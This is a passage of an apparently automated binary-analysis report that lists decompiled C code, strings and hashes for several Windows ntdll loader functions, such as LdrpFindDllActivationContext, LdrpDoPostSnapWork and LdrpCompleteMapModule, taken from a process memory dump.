                                                                      									_v32 = 0;
                                                                      								} else {
                                                                      									_t280 = 0;
                                                                      								}
                                                                      								_t174 = _v8;
                                                                      								if(_v8 != 0) {
                                                                      									L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                                      								}
                                                                      								_v8 = _t280;
                                                                      								goto L46;
                                                                      							}
                                                                      							_t243 = _v48;
                                                                      							do {
                                                                      								 *_t277 = 0;
                                                                      								_t278 = _t277 + 2;
                                                                      								E00A3BB40(_t257,  &_v68, _t243);
                                                                      								if(L00A043C0( &_v68,  &_v24) != 0) {
                                                                      									_t280 =  &(_t280[0]);
                                                                      								}
                                                                      								_t243 = _t278;
                                                                      								_t277 = E00A41370(_t278, 0x9d4e90);
                                                                      								_pop(_t257);
                                                                      							} while (_t277 != 0);
                                                                      							_v48 = _t243;
                                                                      							_t242 = _v52;
                                                                      							goto L38;
                                                                      						}
                                                                      					}
                                                                      					_t191 = _v12;
                                                                      					_t260 = _v12 + 4;
                                                                      					_v28 = _t260;
                                                                      					if(_t260 == 0) {
                                                                      						_t275 = _t280;
                                                                      						_v16 = _t280;
                                                                      					} else {
                                                                      						_t275 = L00A14620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                                      						_t191 = _v12;
                                                                      						_v16 = _t275;
                                                                      					}
                                                                      					if(_t275 == 0) {
                                                                      						_v28 = _t280;
                                                                      						_t280 = 0xc0000017;
                                                                      						goto L47;
                                                                      					} else {
                                                                      						E00A3F3E0(_t275, _v8, _t191);
                                                                      						_t285 = _t285 + 0xc;
                                                                      						_v48 = _t275;
                                                                      						_t279 = _t280;
                                                                      						_t281 = E00A41370(_v16, 0x9d4e90);
                                                                      						_pop(_t262);
                                                                      						if(_t281 != 0) {
                                                                      							_t244 = _v48;
                                                                      							do {
                                                                      								 *_t281 = 0;
                                                                      								_t282 = _t281 + 2;
                                                                      								E00A3BB40(_t262,  &_v68, _t244);
                                                                      								if(L00A043C0( &_v68,  &_v24) != 0) {
                                                                      									_t279 =  &(_t279[0]);
                                                                      								}
                                                                      								_t244 = _t282;
                                                                      								_t281 = E00A41370(_t282, 0x9d4e90);
                                                                      								_pop(_t262);
                                                                      							} while (_t281 != 0);
                                                                      							_v48 = _t244;
                                                                      							_t242 = _v52;
                                                                      						}
                                                                      						_t201 = _v48;
                                                                      						_t280 = 0;
                                                                      						if( *_v48 != 0) {
                                                                      							E00A3BB40(_t262,  &_v68, _t201);
                                                                      							if(L00A043C0( &_v68,  &_v24) != 0) {
                                                                      								_t279 =  &(_t279[0]);
                                                                      							}
                                                                      						}
                                                                      						if(_t279 == 0) {
                                                                      							L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                                      							_v28 = _t280;
                                                                      							_v16 = _t280;
                                                                      						}
                                                                      						_t202 = _v8;
                                                                      						if(_v8 != 0) {
                                                                      							L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                                      						}
                                                                      						_v8 = _t280;
                                                                      						goto L28;
                                                                      					}
                                                                      				}
                                                                      				_t214 = _v12;
                                                                      				_t264 = _v12 + 4;
                                                                      				_v40 = _t264;
                                                                      				if(_t264 == 0) {
                                                                      					_v20 = _t280;
                                                                      				} else {
                                                                      					_t236 = L00A14620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                                      					_t280 = _t236;
                                                                      					_v20 = _t236;
                                                                      					_t214 = _v12;
                                                                      				}
                                                                      				if(_t280 == 0) {
                                                                      					_t161 = 0;
                                                                      					_t280 = 0xc0000017;
                                                                      					_v40 = 0;
                                                                      					goto L48;
                                                                      				} else {
                                                                      					E00A3F3E0(_t280, _v8, _t214);
                                                                      					_t285 = _t285 + 0xc;
                                                                      					_v48 = _t280;
                                                                      					_t283 = E00A41370(_t280, 0x9d4e90);
                                                                      					_pop(_t267);
                                                                      					if(_t283 != 0) {
                                                                      						_t245 = _v48;
                                                                      						do {
                                                                      							 *_t283 = 0;
                                                                      							_t284 = _t283 + 2;
                                                                      							E00A3BB40(_t267,  &_v68, _t245);
                                                                      							if(L00A043C0( &_v68,  &_v24) != 0) {
                                                                      								_t275 = _t275 + 1;
                                                                      							}
                                                                      							_t245 = _t284;
                                                                      							_t283 = E00A41370(_t284, 0x9d4e90);
                                                                      							_pop(_t267);
                                                                      						} while (_t283 != 0);
                                                                      						_v48 = _t245;
                                                                      						_t242 = _v52;
                                                                      					}
                                                                      					_t224 = _v48;
                                                                      					_t280 = 0;
                                                                      					if( *_v48 != 0) {
                                                                      						E00A3BB40(_t267,  &_v68, _t224);
                                                                      						if(L00A043C0( &_v68,  &_v24) != 0) {
                                                                      							_t275 = _t275 + 1;
                                                                      						}
                                                                      					}
                                                                      					if(_t275 == 0) {
                                                                      						L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                                      						_v40 = _t280;
                                                                      						_v20 = _t280;
                                                                      					}
                                                                      					_t225 = _v8;
                                                                      					if(_v8 != 0) {
                                                                      						L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                                      					}
                                                                      					_v8 = _t280;
                                                                      					goto L16;
                                                                      				}
                                                                      			}











































                                                                      Strings
                                                                      • Kernel-MUI-Language-SKU, xrefs: 00A03F70
                                                                      • WindowsExcludedProcs, xrefs: 00A03D6F
                                                                      • Kernel-MUI-Number-Allowed, xrefs: 00A03D8C
                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 00A03E97
                                                                      • Kernel-MUI-Language-Allowed, xrefs: 00A03DC0
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                      • API String ID: 0-258546922
                                                                      • Opcode ID: a960a51c74b8df31cfea583a8c8ea9f3f686ce52781352ffceb7edf34dfc2ab3
                                                                      • Instruction ID: 8b708340748c21e9a843bdb8943a17c74733351dc6b631c40bacd128d4bf2ee6
                                                                      • Opcode Fuzzy Hash: a960a51c74b8df31cfea583a8c8ea9f3f686ce52781352ffceb7edf34dfc2ab3
                                                                      • Instruction Fuzzy Hash: F6F13D76D00219EBCF11DF98D981AEEBBB9FF48750F14406AE915BB251D7349E01CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 44%
                                                                      			E00A28E00(void* __ecx) {
                                                                      				signed int _v8;
                                                                      				char _v12;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				intOrPtr* _t32;
                                                                      				intOrPtr _t35;
                                                                      				intOrPtr _t43;
                                                                      				void* _t46;
                                                                      				intOrPtr _t47;
                                                                      				void* _t48;
                                                                      				signed int _t49;
                                                                      				void* _t50;
                                                                      				intOrPtr* _t51;
                                                                      				signed int _t52;
                                                                      				void* _t53;
                                                                      				intOrPtr _t55;
                                                                      
                                                                      				_v8 =  *0xaed360 ^ _t52;
                                                                      				_t49 = 0;
                                                                      				_t48 = __ecx;
                                                                      				_t55 =  *0xae8464; // 0x74790110
                                                                      				if(_t55 == 0) {
                                                                      					L9:
                                                                      					if( !_t49 >= 0) {
                                                                      						if(( *0xae5780 & 0x00000003) != 0) {
                                                                      							E00A75510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                                      						}
                                                                      						if(( *0xae5780 & 0x00000010) != 0) {
                                                                      							asm("int3");
                                                                      						}
                                                                      					}
                                                                      					return E00A3B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                                      				}
                                                                      				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                                      				_t43 =  *0xae7984; // 0x4c2b90
                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                                      					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                                      					if(_t48 == _t43) {
                                                                      						_t50 = 0x5c;
                                                                      						if( *_t32 == _t50) {
                                                                      							_t46 = 0x3f;
                                                                      							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                                      								_t32 = _t32 + 8;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					_t51 =  *0xae8464; // 0x74790110
                                                                      					 *0xaeb1e0(_t47, _t32,  &_v12);
                                                                      					_t49 =  *_t51();
                                                                      					if(_t49 >= 0) {
                                                                      						L8:
                                                                      						_t35 = _v12;
                                                                      						if(_t35 != 0) {
                                                                      							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                                      								E00A29B10( *((intOrPtr*)(_t48 + 0x48)));
                                                                      								_t35 = _v12;
                                                                      							}
                                                                      							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                                      						}
                                                                      						goto L9;
                                                                      					}
                                                                      					if(_t49 != 0xc000008a) {
                                                                      						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                                      							if(_t49 != 0xc00000bb) {
                                                                      								goto L8;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					if(( *0xae5780 & 0x00000005) != 0) {
                                                                      						_push(_t49);
                                                                      						E00A75510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                                      						_t53 = _t53 + 0x1c;
                                                                      					}
                                                                      					_t49 = 0;
                                                                      					goto L8;
                                                                      				} else {
                                                                      					goto L9;
                                                                      				}
                                                                      			}


                                                                      Strings
                                                                      • LdrpFindDllActivationContext, xrefs: 00A69331, 00A6935D
                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 00A6933B, 00A69367
                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 00A69357
                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 00A6932A
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                      • API String ID: 0-3779518884
                                                                      • Opcode ID: 51e5fbdbeb1c41f66ef3f20cc13196e5fda0e890fd5cfa689bb7d06262e8ef32
                                                                      • Instruction ID: 23a7d526165e2d596b018550fc7ce30cdc0904479466aab9eadf0c2eacc1f463
                                                                      • Opcode Fuzzy Hash: 51e5fbdbeb1c41f66ef3f20cc13196e5fda0e890fd5cfa689bb7d06262e8ef32
                                                                      • Instruction Fuzzy Hash: 23411A32A423359FDB35AB5CFC89A7672B5AB50758F07857AF8045B1A1EF78DC808381
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 83%
                                                                      			E00A08794(void* __ecx) {
                                                                      				signed int _v0;
                                                                      				char _v8;
                                                                      				signed int _v12;
                                                                      				void* _v16;
                                                                      				signed int _v20;
                                                                      				intOrPtr _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v40;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				intOrPtr* _t77;
                                                                      				signed int _t80;
                                                                      				signed char _t81;
                                                                      				signed int _t87;
                                                                      				signed int _t91;
                                                                      				void* _t92;
                                                                      				void* _t94;
                                                                      				signed int _t95;
                                                                      				signed int _t103;
                                                                      				signed int _t105;
                                                                      				signed int _t110;
                                                                      				signed int _t118;
                                                                      				intOrPtr* _t121;
                                                                      				intOrPtr _t122;
                                                                      				signed int _t125;
                                                                      				signed int _t129;
                                                                      				signed int _t131;
                                                                      				signed int _t134;
                                                                      				signed int _t136;
                                                                      				signed int _t143;
                                                                      				signed int* _t147;
                                                                      				signed int _t151;
                                                                      				void* _t153;
                                                                      				signed int* _t157;
                                                                      				signed int _t159;
                                                                      				signed int _t161;
                                                                      				signed int _t166;
                                                                      				signed int _t168;
                                                                      
                                                                      				_push(__ecx);
                                                                      				_t153 = __ecx;
                                                                      				_t159 = 0;
                                                                      				_t121 = __ecx + 0x3c;
                                                                      				if( *_t121 == 0) {
                                                                      					L2:
                                                                      					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                                      					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                                      						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                                      						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                                      						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                                      							L6:
                                                                      							if(E00A0934A() != 0) {
                                                                      								_t159 = E00A7A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                                      								__eflags = _t159;
                                                                      								if(_t159 < 0) {
                                                                      									_t81 =  *0xae5780; // 0x0
                                                                      									__eflags = _t81 & 0x00000003;
                                                                      									if((_t81 & 0x00000003) != 0) {
                                                                      										_push(_t159);
                                                                      										E00A75510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                                      										_t81 =  *0xae5780; // 0x0
                                                                      									}
                                                                      									__eflags = _t81 & 0x00000010;
                                                                      									if((_t81 & 0x00000010) != 0) {
                                                                      										asm("int3");
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							_t159 = E00A0849B(0, _t122, _t153, _t159, _t180);
                                                                      							if(_t159 >= 0) {
                                                                      								goto L6;
                                                                      							}
                                                                      						}
                                                                      						_t80 = _t159;
                                                                      						goto L8;
                                                                      					} else {
                                                                      						_t125 = 0x13;
                                                                      						asm("int 0x29");
                                                                      						_push(0);
                                                                      						_push(_t159);
                                                                      						_t161 = _t125;
                                                                      						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                                      						_t143 = 0;
                                                                      						_v40 = _t161;
                                                                      						_t118 = 0;
                                                                      						_push(_t153);
                                                                      						__eflags = _t87;
                                                                      						if(_t87 != 0) {
                                                                      							_t118 = _t87 + 0x5d8;
                                                                      							__eflags = _t118;
                                                                      							if(_t118 == 0) {
                                                                      								L46:
                                                                      								_t118 = 0;
                                                                      							} else {
                                                                      								__eflags =  *(_t118 + 0x30);
                                                                      								if( *(_t118 + 0x30) == 0) {
                                                                      									goto L46;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						_v32 = 0;
                                                                      						_v28 = 0;
                                                                      						_v16 = 0;
                                                                      						_v20 = 0;
                                                                      						_v12 = 0;
                                                                      						__eflags = _t118;
                                                                      						if(_t118 != 0) {
                                                                      							__eflags = _t161;
                                                                      							if(_t161 != 0) {
                                                                      								__eflags =  *(_t118 + 8);
                                                                      								if( *(_t118 + 8) == 0) {
                                                                      									L22:
                                                                      									_t143 = 1;
                                                                      									__eflags = 1;
                                                                      								} else {
                                                                      									_t19 = _t118 + 0x40; // 0x40
                                                                      									_t156 = _t19;
                                                                      									E00A08999(_t19,  &_v16);
                                                                      									__eflags = _v0;
                                                                      									if(_v0 != 0) {
                                                                      										__eflags = _v0 - 1;
                                                                      										if(_v0 != 1) {
                                                                      											goto L22;
                                                                      										} else {
                                                                      											_t128 =  *(_t161 + 0x64);
                                                                      											__eflags =  *(_t161 + 0x64);
                                                                      											if( *(_t161 + 0x64) == 0) {
                                                                      												goto L22;
                                                                      											} else {
                                                                      												E00A08999(_t128,  &_v12);
                                                                      												_t147 = _v12;
                                                                      												_t91 = 0;
                                                                      												__eflags = 0;
                                                                      												_t129 =  *_t147;
                                                                      												while(1) {
                                                                      													__eflags =  *((intOrPtr*)(0xae5c60 + _t91 * 8)) - _t129;
                                                                      													if( *((intOrPtr*)(0xae5c60 + _t91 * 8)) == _t129) {
                                                                      														break;
                                                                      													}
                                                                      													_t91 = _t91 + 1;
                                                                      													__eflags = _t91 - 5;
                                                                      													if(_t91 < 5) {
                                                                      														continue;
                                                                      													} else {
                                                                      														_t131 = 0;
                                                                      														__eflags = 0;
                                                                      													}
                                                                      													L37:
                                                                      													__eflags = _t131;
                                                                      													if(_t131 != 0) {
                                                                      														goto L22;
                                                                      													} else {
                                                                      														__eflags = _v16 - _t147;
                                                                      														if(_v16 != _t147) {
                                                                      															goto L22;
                                                                      														} else {
                                                                      															E00A12280(_t92, 0xae86cc);
                                                                      															_t94 = E00AC9DFB( &_v20);
                                                                      															__eflags = _t94 - 1;
                                                                      															if(_t94 != 1) {
                                                                      															}
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															 *_t118 =  *_t118 + 1;
                                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                                      															_t95 = E00A261A0( &_v32);
                                                                      															__eflags = _t95;
                                                                      															if(_t95 != 0) {
                                                                      																__eflags = _v32 | _v28;
                                                                      																if((_v32 | _v28) != 0) {
                                                                      																	_t71 = _t118 + 0x40; // 0x3f
                                                                      																	_t134 = _t71;
                                                                      																	goto L55;
                                                                      																}
                                                                      															}
                                                                      															goto L30;
                                                                      														}
                                                                      													}
                                                                      													goto L56;
                                                                      												}
                                                                      												_t92 = 0xae5c64 + _t91 * 8;
                                                                      												asm("lock xadd [eax], ecx");
                                                                      												_t131 = (_t129 | 0xffffffff) - 1;
                                                                      												goto L37;
                                                                      											}
                                                                      										}
                                                                      										goto L56;
                                                                      									} else {
                                                                      										_t143 = E00A08A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                                      										__eflags = _t143;
                                                                      										if(_t143 != 0) {
                                                                      											_t157 = _v12;
                                                                      											_t103 = 0;
                                                                      											__eflags = 0;
                                                                      											_t136 =  &(_t157[1]);
                                                                      											 *(_t161 + 0x64) = _t136;
                                                                      											_t151 =  *_t157;
                                                                      											_v20 = _t136;
                                                                      											while(1) {
                                                                      												__eflags =  *((intOrPtr*)(0xae5c60 + _t103 * 8)) - _t151;
                                                                      												if( *((intOrPtr*)(0xae5c60 + _t103 * 8)) == _t151) {
                                                                      													break;
                                                                      												}
                                                                      												_t103 = _t103 + 1;
                                                                      												__eflags = _t103 - 5;
                                                                      												if(_t103 < 5) {
                                                                      													continue;
                                                                      												}
                                                                      												L21:
                                                                      												_t105 = E00A3F380(_t136, 0x9d1184, 0x10);
                                                                      												__eflags = _t105;
                                                                      												if(_t105 != 0) {
                                                                      													__eflags =  *_t157 -  *_v16;
                                                                      													if( *_t157 >=  *_v16) {
                                                                      														goto L22;
                                                                      													} else {
                                                                      														asm("cdq");
                                                                      														_t166 = _t157[5] & 0x0000ffff;
                                                                      														_t108 = _t157[5] & 0x0000ffff;
                                                                      														asm("cdq");
                                                                      														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                                      														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                                      														if(__eflags > 0) {
                                                                      															L29:
                                                                      															E00A12280(_t108, 0xae86cc);
                                                                      															 *_t118 =  *_t118 + 1;
                                                                      															_t42 = _t118 + 0x40; // 0x3f
                                                                      															_t156 = _t42;
                                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															_t110 = E00A261A0( &_v32);
                                                                      															__eflags = _t110;
                                                                      															if(_t110 != 0) {
                                                                      																__eflags = _v32 | _v28;
                                                                      																if((_v32 | _v28) != 0) {
                                                                      																	_t134 = _v20;
                                                                      																	L55:
                                                                      																	E00AC9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                                      																}
                                                                      															}
                                                                      															L30:
                                                                      															 *_t118 =  *_t118 + 1;
                                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                                      															E00A0FFB0(_t118, _t156, 0xae86cc);
                                                                      															goto L22;
                                                                      														} else {
                                                                      															if(__eflags < 0) {
                                                                      																goto L22;
                                                                      															} else {
                                                                      																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                                      																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                                      																	goto L22;
                                                                      																} else {
                                                                      																	goto L29;
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      													goto L56;
                                                                      												}
                                                                      												goto L22;
                                                                      											}
                                                                      											asm("lock inc dword [eax]");
                                                                      											goto L21;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						return _t143;
                                                                      					}
                                                                      				} else {
                                                                      					_push( &_v8);
                                                                      					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                                      					_push(__ecx + 0x40);
                                                                      					_push(_t121);
                                                                      					_push(0xffffffff);
                                                                      					_t80 = E00A39A00();
                                                                      					_t159 = _t80;
                                                                      					if(_t159 < 0) {
                                                                      						L8:
                                                                      						return _t80;
                                                                      					} else {
                                                                      						goto L2;
                                                                      					}
                                                                      				}
                                                                      				L56:
                                                                      			}













































                                                                      Strings
                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 00A59C28
                                                                      • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 00A59C18
                                                                      • LdrpDoPostSnapWork, xrefs: 00A59C1E
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                      • API String ID: 2994545307-1948996284
                                                                      • Opcode ID: 05578aedbaf8c5c70d1d14ae4ef6d4739cfb01bd89b8a604322cb5483dca28bd
                                                                      • Instruction ID: ca451e24045bff894118f31a6966d69de4d0e5b30275382cd71a443505b0f6a6
                                                                      • Opcode Fuzzy Hash: 05578aedbaf8c5c70d1d14ae4ef6d4739cfb01bd89b8a604322cb5483dca28bd
                                                                      • Instruction Fuzzy Hash: 8F911631A0021EDFDF18DF59E881ABA73B5FF44354B548069E885AB292DF34ED05CB98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 98%
                                                                      			E00A07E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                      				char _v8;
                                                                      				intOrPtr _v12;
                                                                      				intOrPtr _v16;
                                                                      				intOrPtr _v20;
                                                                      				char _v24;
                                                                      				signed int _t73;
                                                                      				void* _t77;
                                                                      				char* _t82;
                                                                      				char* _t87;
                                                                      				signed char* _t97;
                                                                      				signed char _t102;
                                                                      				intOrPtr _t107;
                                                                      				signed char* _t108;
                                                                      				intOrPtr _t112;
                                                                      				intOrPtr _t124;
                                                                      				intOrPtr _t125;
                                                                      				intOrPtr _t126;
                                                                      
                                                                      				_t107 = __edx;
                                                                      				_v12 = __ecx;
                                                                      				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                                      				_t124 = 0;
                                                                      				_v20 = __edx;
                                                                      				if(E00A0CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                                      					_t112 = _v8;
                                                                      				} else {
                                                                      					_t112 = 0;
                                                                      					_v8 = 0;
                                                                      				}
                                                                      				if(_t112 != 0) {
                                                                      					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                                      						_t124 = 0xc000007b;
                                                                      						goto L8;
                                                                      					}
                                                                      					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                                      					 *(_t125 + 0x34) = _t73;
                                                                      					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                                      						goto L3;
                                                                      					}
                                                                      					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                                      					_t124 = E009FC9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                                      					if(_t124 < 0) {
                                                                      						goto L8;
                                                                      					} else {
                                                                      						goto L3;
                                                                      					}
                                                                      				} else {
                                                                      					L3:
                                                                      					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                                      						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                                      						L8:
                                                                      						return _t124;
                                                                      					}
                                                                      					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                                      						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                                      							goto L5;
                                                                      						}
                                                                      						_t102 =  *0xae5780; // 0x0
                                                                      						if((_t102 & 0x00000003) != 0) {
                                                                      							E00A75510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                                      							_t102 =  *0xae5780; // 0x0
                                                                      						}
                                                                      						if((_t102 & 0x00000010) != 0) {
                                                                      							asm("int3");
                                                                      						}
                                                                      						_t124 = 0xc0000428;
                                                                      						goto L8;
                                                                      					}
                                                                      					L5:
                                                                      					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                                      						goto L8;
                                                                      					}
                                                                      					_t77 = _a4 - 0x40000003;
                                                                      					if(_t77 == 0 || _t77 == 0x33) {
                                                                      						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                                      						if(E00A17D50() != 0) {
                                                                      							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                      						} else {
                                                                      							_t82 = 0x7ffe0384;
                                                                      						}
                                                                      						_t108 = 0x7ffe0385;
                                                                      						if( *_t82 != 0) {
                                                                      							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                      								if(E00A17D50() == 0) {
                                                                      									_t97 = 0x7ffe0385;
                                                                      								} else {
                                                                      									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                      								}
                                                                      								if(( *_t97 & 0x00000020) != 0) {
                                                                      									E00A77016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						if(_a4 != 0x40000003) {
                                                                      							L14:
                                                                      							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                                      							if(E00A17D50() != 0) {
                                                                      								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                      							} else {
                                                                      								_t87 = 0x7ffe0384;
                                                                      							}
                                                                      							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                      								if(E00A17D50() != 0) {
                                                                      									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                      								}
                                                                      								if(( *_t108 & 0x00000020) != 0) {
                                                                      									E00A77016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                                      								}
                                                                      							}
                                                                      							goto L8;
                                                                      						} else {
                                                                      							_v16 = _t125 + 0x24;
                                                                      							_t124 = E00A2A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                                      							if(_t124 < 0) {
                                                                      								E009FB1E1(_t124, 0x1490, 0, _v16);
                                                                      								goto L8;
                                                                      							}
                                                                      							goto L14;
                                                                      						}
                                                                      					} else {
                                                                      						goto L8;
                                                                      					}
                                                                      				}
                                                                      			}





















                                                                      Strings
                                                                      • minkernel\ntdll\ldrmap.c, xrefs: 00A598A2
                                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 00A59891
                                                                      • LdrpCompleteMapModule, xrefs: 00A59898
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                      • API String ID: 0-1676968949
                                                                      • Opcode ID: 8e549fec6a99eb2d9d12bb8ae571c93db5d1d2e053a5ad76b6b19b961a797872
                                                                      • Instruction ID: 9c02a753a0232006e7e60becf61cf500f219b40e2764d8e4dfecfb98c78429fb
                                                                      • Opcode Fuzzy Hash: 8e549fec6a99eb2d9d12bb8ae571c93db5d1d2e053a5ad76b6b19b961a797872
                                                                      • Instruction Fuzzy Hash: C951DE31A09749DBDB21CB68D944B6EB7B4BF41314F1406A9E8519B3E2D770FD00CB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E009FE620(void* __ecx, short* __edx, short* _a4) {
                                                                      				char _v16;
                                                                      				char _v20;
